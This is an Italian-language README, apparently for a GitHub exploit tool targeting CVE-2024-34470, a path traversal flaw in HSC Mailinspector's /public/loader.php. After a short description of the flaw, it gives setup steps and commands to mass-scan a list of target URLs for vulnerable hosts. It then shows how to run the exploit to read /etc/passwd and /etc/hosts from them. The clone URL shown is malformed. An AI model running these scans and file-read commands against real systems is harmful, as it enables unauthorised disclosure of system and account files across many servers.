
È stata trovata una vulnerabilità critica in HSC Mailinspector fino alla versione 5.2.18. Questa vulnerabilità interessa una funzionalità sconosciuta del file /public/loader.php.
Una vulnerabilità critica è stata trovata in HSC Mailinspector fino alla versione 5.2.18. Questa vulnerabilità interessa una funzionalità sconosciuta del file /public/loader.php. La manipolazione dell'argomento 'path' con un input sconosciuto porta a una vulnerabilità di path traversal. Secondo CWE, questo problema è classificato come CWE-22. Il prodotto utilizza input esterni per costruire un percorso destinato a identificare un file o una directory situati all'interno di una directory padre ristretta, ma non neutralizza correttamente gli elementi speciali all'interno del percorso che possono far sì che il percorso risolva a una posizione al di fuori della directory ristretta. Questo compromette riservatezza, integrità e disponibilità.
Clona il repository:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
Installa le dipendenze
Assicurati di avere Python e pip installati. Quindi, esegui:
pip install -r requirements.txt
Per effettuare una ricerca su più target utilizzando un file di testo, usa lo script Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
Il formato in cui il file urls.txt deve essere è il seguente:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
Una volta identificati i target vulnerabili, usiamo lo script chiamato CVE-2024-34470.py per sfruttare e visualizzare il contenuto specificato tramite il terminale.
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)